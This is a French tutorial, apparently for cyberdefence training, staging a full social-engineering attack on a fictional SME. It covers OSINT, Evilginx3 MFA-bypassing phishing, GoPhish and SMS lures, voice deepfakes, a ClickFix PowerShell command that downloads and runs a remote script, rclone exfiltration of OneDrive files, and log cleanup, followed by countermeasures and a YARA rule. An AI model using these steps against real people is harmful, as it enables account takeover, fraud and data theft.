⚠️ LABORATOIRE ISOLÉ OBLIGATOIRE – Utilisation uniquement sur des systèmes que vous possédez ou avec autorisation explicite. Article 323-1 du Code pénal français. Formation éthique pour cyberdéfenseurs.

Mission : Mitnick – L'Ingénierie Sociale de A à Z (Kali 2026)

Scénario réaliste inspiré des méthodes de Kevin Mitnick : OSINT, spear‑phishing, deepfake vocal & backdoor psychologique
Outils Kali à jour, techniques 2026, et contre‑mesures pour cyberdéfenseurs

🎯 Introduction & l'esprit Mitnick

Kevin Mitnick ne cassait pas des algorithmes, il cassait des personnes. Dans les années 90, il a prouvé que le maillon le plus faible de la sécurité, c'est l'humain. En 2026, ses techniques n'ont pas pris une ride – elles ont juste changé de support. L'IA générative et les deepfakes ont décuplé la puissance de l'ingénierie sociale, rendant les attaques plus crédibles que jamais.

📊 Chiffres 2026 : pourquoi l'ingénierie sociale domine encore

  • 82-83% des e-mails de phishing contiennent du contenu généré par IA (source : Medha Cloud / analyses 2026)
  • +1265% d'augmentation des phishing "AI-crafted" depuis l'arrivée de ChatGPT (Hoxhunt Phishing Trends 2026)
  • +54% de taux de clic sur les phishing générés par IA vs humains
  • +15% d'augmentation des deepfake impersonations en un an
  • 70-98% des breaches impliquent de l'ingénierie sociale (selon les études)
  • +517% d'explosion des campagnes ClickFix en 2025, tendance qui se poursuit en 2026
  • BEC (Business Email Compromise) + fraude sur factures reste parmi les attaques les plus coûteuses

Ce tutoriel vous plonge dans la peau d'un attaquant en ingénierie sociale qui utilise Kali Linux pour mener une opération complète, de la reconnaissance à l'exfiltration de données sensibles, sans écrire une seule ligne de code malveillant. La cible : une PME française spécialisée dans les marchés publics. L'objectif : voler des appels d'offres confidentiels.

graph TD A[Phase 1
Reconnaissance OSINT] --> B[Phase 2
Multi‑channel : Email + SMS + Appel deepfake + ClickFix] B --> C[Phase 3
Exploitation & Backdoor humaine] C --> D[Accès aux documents sensibles] style A fill:#00ff9d20 style B fill:#00ff9d20 style C fill:#00ff9d20 style D fill:#ff336620

Cible (reconstituée par OSINT)

Le Lab : Une VM Kali Linux (attaquant), une VM Windows 11 (poste de la cible) et un serveur Ubuntu (hébergeant Evilginx3 et GoPhish). Réseau host‑only isolé.

🔍 Phase 1 : La récolte d’informations (OSINT) – version 2026

Mitnick passait des jours à fouiller les poubelles et à écouter les conversations. Aujourd'hui, on utilise Kali et des outils automatisés, mais la psychologie reste la même.

Étape 1.1 – Collecte sur les réseaux sociaux

Avec theHarvester et Maigret, on récupère les emails, comptes et centres d'intérêt liés à DefenseTech.

# theHarvester : moissonnage d'emails et de domaines
theHarvester -d defensetech.fr -b linkedin,google,bing -l 200

# Maigret : recherche de comptes sur 3000+ sites
maigret m.l@defensetech.fr --pdf

On identifie Marc L. et son adresse : m.l@defensetech.fr. On note aussi le fournisseur cloud : Office 365. Maigret nous donne son pseudo "MarcRS" sur le forum PassionRS.

Étape 1.2 – Reconnaissance approfondie avec Maltego

On lance Maltego (communauté) pour visualiser les relations. On découvre que Marc est membre d'un club de propriétaires de Porsche. On note le nom du forum "PassionRS" et son pseudo "MarcRS".

Étape 1.3 – Recherche de fuites de mots de passe

On utilise l'outil holehe et l'API d'Epieos pour vérifier si le mail de Marc est présent sur des sites tiers.

# holehe : savoir si l'email est inscrit sur des services
holehe m.l@defensetech.fr --only-used

# Epieos (interface web ou API) pour rechercher des comptes
curl -X POST https://api.epieos.com/search -d "email=m.l@defensetech.fr"

Résultat : compte actif sur LinkedIn, Twitter (obsolète), et surtout sur le forum "PassionRS". Bingo.

Étape 1.4 – Récupération de mots de passe sur des leaks

On consulte des bases de données de fuites (téléchargées légalement dans le lab, ex. "Have I Been Pwned" offline). On trouve que le mot de passe de Marc sur un ancien forum (compromis) était "Porsche911!".

Note : En vrai, l'utilisation de mots de passe leakés est illégale sans autorisation. Ici, c'est un scénario de lab.

On note ce mot de passe. Il pourrait être réutilisé ailleurs.

Étape 1.5 – Création d’un scénario crédible

Avec toutes ces infos, on peut construire une histoire solide. On sait que Marc a une Porsche, qu'il utilise le forum PassionRS, et qu'il travaille chez DefenseTech. On va créer un piège sur mesure en utilisant plusieurs canaux pour maximiser l'impact.

🎣 Phase 2 : L’attaque multi‑canaux – Email, SMS, appel deepfake, ClickFix

En 2026, une seule tentative ne suffit plus. Les attaquants professionnels combinent plusieurs vecteurs pour submerger la cible et renforcer la crédibilité.

Étape 2.1 – Mise en place d’Evilginx3 pour contourner la MFA

Au lieu de cloner un simple formulaire, on utilise Evilginx3, un framework de reverse proxy qui capture les tokens de session et contourne l'authentification multi‑facteurs. On l'installe sur notre serveur Ubuntu.

# Installation d'Evilginx3
git clone https://github.com/kgretzky/evilginx3.git
cd evilginx3
make
sudo ./evilginx -p phishlets/

# Configuration d'un phishlet pour Office 365
config domain defensetech.phishing.com
config ip 192.168.1.100
phishlet load office365
phishlet office365 enable
phishlet office365 set redirect_url https://www.defensetech.fr
lures create office365
lures get-url 0

On obtient une URL de phishing (ex. https://defensetech.phishing.com/login) qui affiche la vraie page de Microsoft et capture les cookies après connexion.

Note 2026 : Evilginx3 ne peut pas capturer les authentifications par clés physiques FIDO2 (passkeys). De plus, les phishlets Office 365 / Entra ID sont très surveillés – utilisez des domaines fraîchement enregistrés et des certificats Let's Encrypt valides pour passer les contrôles de base.

Étape 2.2 – Campagne d’emails avec GoPhish

On utilise GoPhish pour envoyer des emails personnalisés et suivre les clics. On configure un profil SMTP avec un service relais légitime (Mailgun, SendGrid) pour éviter les filtres anti‑spam.

# Installation de GoPhish
wget https://github.com/gophish/gophish/releases/download/v0.12.0/gophish-v0.12.0-linux-64bit.zip
unzip gophish*.zip
sudo ./gophish

# Interface web : créer un groupe "Marc", un template d'email (concours Porsche), et lancer la campagne.

Le template d'email (généré par IA) :

Objet : 🏆 Concours privé PassionRS : gagnez un stage de pilotage sur le circuit du Mans !

Bonjour MarcRS,

En exclusivité pour les membres actifs, PassionRS organise un tirage au sort pour un stage de pilotage au volant d'une 911 GT3. Pour valider votre participation, connectez-vous à votre espace membre avant vendredi.

👉 [LIEN DE CONNEXION]  (redirige vers le site Evilginx3)

L'équipe PassionRS

Étape 2.3 – Renforcement par SMS (Smishing)

Quelques heures après l'email, on envoie un SMS avec un lien raccourci (via une passerelle SMS anonyme) pour rappeler l'urgence.

# Envoi de SMS via Twilio (script Python)
from twilio.rest import Client
client = Client(account_sid, auth_token)
client.messages.create(body="Marc, dernier rappel pour le concours Porsche ! Clique ici : https://defensetech.phishing.com/login", from_="+33612345678", to="+33698765432")

Étape 2.4 – Deepfake vocal conversationnel (temps réel)

Marc n'a pas cliqué ? On passe à l'appel. On utilise ElevenLabs (ou XTTS‑v2 en local) pour cloner la voix du responsable du forum. Grâce à une interface Python + Twilio Media Streams, on peut interagir en temps réel.

# Script Python avec Twilio Media Streams + ElevenLabs WebSocket
# (Schéma : l'appel est connecté à un websocket qui génère l'audio à la volée)
from twilio.twiml.voice_response import VoiceResponse, Start
response = VoiceResponse()
start = Start()
start.stream(url='wss://notre-serveur-websocket/stream')
response.append(start)
response.say("Allô Marc, c'est Julien du forum PassionRS...")
print(response)

# Sur le serveur WebSocket : réception du texte, appel ElevenLabs, envoi audio

Si Marc répond, le système peut même analyser ses réponses avec un LLM pour adapter la conversation (agentic AI).

Étape 2.5 – La technique ClickFix (LA tendance 2026)

Si les autres vecteurs échouent, on utilise une méthode encore plus vicieuse : le ClickFix. Aucun lien à cliquer – l'utilisateur est invité à copier-coller une commande PowerShell.

Flux typique :

  1. La cible visite un site compromis ou reçoit un pop-up frauduleux (via publicité malveillante).
  2. Message : "Votre session Zoom a expiré. Pour corriger, copiez cette commande dans PowerShell (Windows + R, tapez powershell, collez et validez)."
  3. La commande télécharge et exécute un script malveillant qui vole les cookies de session ou installe un accès distant.

Pourquoi c'est dur à bloquer :

# Commande que l'utilisateur copie-colle dans PowerShell
powershell -NoP -NonI -W Hidden -Exec Bypass -Command "Invoke-WebRequest -Uri http://192.168.1.100/payload.ps1 -OutFile $env:TEMP\update.ps1; & $env:TEMP\update.ps1"

Dans notre lab, on peut simuler une page HTML qui affiche cette instruction et logge les visiteurs.

Étape 2.6 – Variante QRishing

Si l'email ne passe pas, on peut générer des QR codes malveillants et les coller dans des lieux publics (cafétéria, parking).

# Générateur de QR code
qrencode -o qr.png "https://defensetech.phishing.com/login"

Étape 2.7 – Capture du token

Marc clique enfin, entre ses identifiants et son code MFA. Evilginx3 capture le cookie de session. On peut maintenant nous connecter à Office 365 sans avoir besoin du mot de passe ni de la MFA.

# Récupération du cookie dans les logs d'Evilginx3
cat ~/.evilginx/logs/sessions.log | grep "cookies"

🚪 Phase 3 : L’accès et la persistance (Backdoor humaine)

Mitnick une fois entré ne laissait pas de programme, mais il s'assurait de pouvoir revenir. Ici, on va créer une "backdoor humaine" : on va placer un employé de l'entreprise en position de nous faire confiance.

Étape 3.1 – Accès initial au réseau

Avec le cookie de session, on se connecte à Office 365 via le navigateur. On explore la boîte mail de Marc, on trouve des informations sur les appels d'offres et les collaborateurs.

Étape 3.2 – Chasse aux documents sensibles

On utilise rclone pour exfiltrer les fichiers OneDrive/SharePoint de manière discrète. Il faut configurer rclone avec un refresh token (pas de mot de passe).

# Utilisation de rclone pour exfiltrer les fichiers OneDrive/SharePoint
rclone config (créer un remote avec le token)
rclone ls remote:Documents
rclone copy remote:Documents ./exfil

Étape 3.3 – Installation d’une "backdoor" sociale

Pour pouvoir revenir sans refaire tout le cirque, on va créer une relation de confiance avec un employé. On repère dans l'Active Directory un autre utilisateur, "Sophie D.", assistante de direction. On va lui envoyer un message Teams (via le compte de Marc) en disant qu'on a un problème urgent et qu'elle doit nous envoyer un fichier "test" sur un partage contrôlé par nous.

# En PowerShell (via le compte de Marc)
Send-Message -Recipient "sophie.d@defensetech.fr" -Body "Salut Sophie, peux-tu déposer le fichier test.xlsx sur le partage temporaire \\192.168.1.100\public ? Merci !"

Le partage est sur notre Kali. Sophie dépose un fichier contenant des infos sensibles (ex. une liste de mots de passe). On a maintenant une backdoor : on peut à tout moment recontacter Sophie en imitant Marc.

Étape 3.4 – Deepfake Teams / Zoom

On peut aller plus loin : avec un deepfake vidéo (outils comme HeyGen ou DeepFaceLive), on peut apparaître en visio avec le visage et la voix de Marc pour demander un virement urgent ou un reset de mot de passe à Sophie. C'est l'attaque la plus redoutée en 2026.

Étape 3.5 – Nettoyage des traces

On efface les logs de connexion (si possible) et on supprime les messages envoyés depuis la boîte de Marc.

# Connexion OWA (Outlook Web Access) et suppression des messages envoyés

Pourquoi ça marche

⚡ Techniques avancées & tableau des menaces 2026

Top 10 des techniques d'ingénierie sociale en 2026

TechniqueCoûtDifficulté de détectionTaux de succès estimé 2026Exemple
Deepfake vocal interactif (agentic AI)MoyenTrès difficileTrès élevé (si pas de code out-of-band)Appel se faisant passer pour le DG avec conversation dynamique
Deepfake vidéo en directÉlevéExtrêmement difficileÉlevéVisio Teams avec le visage du DG
Evilginx3 / reverse proxyFaibleDifficile (contourne MFA sauf FIDO2)Moyen (dépend de l'absence de FIDO2)Phishing avec capture de cookie
Multi‑channel (email+SMS+appel)MoyenMoyenÉlevéPression sur plusieurs canaux en 24h
ClickFix / LAPSUS$ styleFaibleMoyen (émergent)ÉlevéFausse mise à jour navigateur avec copie de commande
QRishing (QR codes)Très faibleMoyenMoyenQR code sur une affiche
Compromission de chaîne d'approvisionnementÉlevéDifficileVariableBackdoor dans un logiciel tiers
BEC + deepfakeMoyenDifficileÉlevéEmail du DG + appel de confirmation
Spear-phishing IA génératifFaibleDifficile (style parfait)+54% vs humainEmail ultra-personnalisé généré par LLM
Agentic AI conversationnelMoyenTrès difficileTrès élevéBot autonome qui mène la conversation sur plusieurs tours

Ce qui a le plus changé depuis Mitnick (1995 → 2026)

🛡️ Stratégies de défense 2026 – Parer les attaques sociales

1. Formation active & simulations

Simulations de phishing régulières, ateliers sur les deepfakes, sensibilisation à l'OSINT. Inclure des tests de deepfake vocal.

2. Authentification forte résistante au phishing

Clés physiques FIDO2 (YubiKey) – les seules à résister à Evilginx3. Les passkeys sont l'avenir.

3. Vérification out‑of‑band systématique

Pour toute demande inhabituelle (même par téléphone), rappeler sur un numéro connu ou utiliser un code à usage unique envoyé par canal différent.

4. Détection de deepfake vocal avancée

Outils comme Pindrop Pulse (analyse acoustique + comportement d'appel), Reality Defender (multimodal), Modulate, ou méthodes open source (Whisper + analyse spectrogramme).

5. Zero Trust Network Access (ZTNA)

Remplacer les VPN par un accès contexte (identité, appareil, localisation).

6. UEBA / analyse comportementale

Détecter les connexions anormales (heure, lieu, volume de données) et les comportements ClickFix.

7. Passerelles email à IA

Solutions comme Abnormal Security, Darktrace, Proofpoint qui détectent les messages générés par LLM.

8. Browser isolation

Isoler les clics sur liens externes dans un environnement distant.

9. Contrôle des supports amovibles

Désactiver l'AutoRun, analyser les clés USB.

10. Authentification des emails (DMARC, DKIM, SPF)

Passer en mode rejet pour les domaines critiques.

11. Détection des commandes PowerShell anormales

Surveiller les processus PowerShell avec des arguments suspects (ScriptBlock Logging, AMSI).

Règles YARA pour détecter les emails de phishing

rule Phishing_PassionRS {
meta:
description = "Détecte les emails frauduleux liés au forum PassionRS"
author = "PCTAMALOU 2026"
strings:
$subject1 = "Concours privé PassionRS" nocase
$subject2 = "stage de pilotage" nocase
$link = "defensetech.phishing.com" nocase
$body_urgent = "urgence" nocase
$body_immediat = "immédiat" nocase
condition:
any of ($subject*) or $link or (2 of ($body_*))
}

Commandes de défense

# Vérifier les en‑têtes DMARC d'un email
swaks --to m.l@defensetech.fr --from contact@passionrs.fr --header-X-Test "test"

# Surveiller les connexions VPN inhabituelles (logs)
grep "VPN login" /var/log/auth.log | awk '{print $1,$2,$3,$10}' | sort | uniq -c

# Activer le ScriptBlock Logging PowerShell
Get-ChildItem -Path HKLM:\SOFTWARE\Policies\Microsoft\Windows\PowerShell\ScriptBlockLogging

# Détecter les programmes eBPF (rootkit éventuel)
sudo bpftool prog list

🔬 Exercices de laboratoire pour les Apaches

Exercice 1 : OSINT avancé

Choisissez une entreprise fictive et utilisez theHarvester, Maigret, Epieos pour récolter des informations. Générez un rapport.

Exercice 2 : Mise en place d'Evilginx3

Installez Evilginx3 sur Kali, configurez un phishlet pour Office 365 (en local) et testez la capture de cookie avec un compte test. Vérifiez que les clés FIDO2 résistent.

Exercice 3 : Deepfake vocal avec ElevenLabs ou XTTS‑v2

Utilisez l'API ElevenLabs (crédits offerts) ou XTTS‑v2 en local pour cloner une voix. Générez une phrase et testez le réalisme.

Exercice 4 : Scénario multi‑canal

En binôme, réalisez une attaque complète : email (GoPhish) + SMS (Twilio) + appel (deepfake) pour soutirer un mot de passe fictif.

Exercice 5 : Simulation ClickFix

Créez une page HTML qui affiche un faux message d'erreur (ex. "Mise à jour Zoom nécessaire") et invite à copier une commande PowerShell inoffensive (ex. Write-Host "ClickFix simulation"). Utilisez un script pour logger les visiteurs.

Exercice 6 : QRishing

Générez un QR code menant à un site de phishing (fictif) et placez‑le dans un espace public. Mesurez le taux de clics (avec autorisation).

Exercice 7 : FIDO2 vs Evilginx

Configurez une clé YubiKey pour un compte Office 365 et testez la résistance à Evilginx3 – c'est LA démonstration qui marque les esprits.

🎯 Conclusion & héritage de Mitnick

Cette mission vous a montré que la technique la plus sophistiquée ne vaut rien face à un employé bien préparé... ou mal préparé. Kevin Mitnick l'avait compris : le véritable firewall, c'est l'humain. En 2026, avec l'IA générative et les deepfakes, cette vulnérabilité est plus grande que jamais.

Enseignements :
1. L'ingénierie sociale est la méthode d'attaque la plus efficace car elle contourne toutes les défenses techniques.
2. La phase de reconnaissance (OSINT) est cruciale – plus vous en savez sur la cible, plus votre piège sera crédible.
3. Les outils modernes (deepfake, Evilginx3, GoPhish) amplifient des techniques vieilles comme le monde.
4. La défense doit être aussi humaine que l'attaque : formation, scepticisme, et culture de sécurité.
5. Les deepfakes vocaux et vidéo exigent des protocoles de vérification robustes (out‑of‑band).
6. ClickFix est LA nouvelle frontière – l'utilisateur devient acteur de sa propre compromission.

Ressources complémentaires

Rappel final : Toutes ces techniques sont à utiliser uniquement dans un cadre légal, sur vos propres systèmes ou avec autorisation. L'ingénierie sociale est un outil puissant pour les testeurs d'intrusion et les défenseurs, pas pour les criminels.